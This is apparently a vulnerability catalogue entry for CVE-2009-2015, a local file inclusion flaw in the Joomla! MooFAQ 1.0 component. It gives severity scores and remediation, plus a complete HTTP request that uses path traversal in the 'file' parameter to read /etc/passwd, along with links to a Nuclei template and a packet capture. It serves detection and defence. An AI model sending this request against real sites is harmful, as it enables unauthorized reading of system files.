| Title | Joomla! MooFAQ 1.0 - Local File Inclusion |
|---|---|
| Author | daffainfo |
| Severity | High |
| Impact | The vulnerability allows an attacker to include arbitrary files from the local file system, potentially leading to unauthorized access, information disclosure. |
| Remediation | Update Joomla! MooFAQ to the latest version or apply the official patch provided by the vendor. |
| CVSS Score | 7.5 |
| EPSS Score | 0.02124 |
| CVE ID | CVE-2009-2015 |
| CWE ID | CWE-22 |
| Tags | cve cve2009 joomla lfi edb vuln |
Joomla! Ideal MooFAQ 1.0 via com_moofaq allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter (local file inclusion).
GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2009/CVE-2009-2015.yaml
🦈 Packet Capture: ⬇️ Download cve-2009-2015.pcap
N/AN/A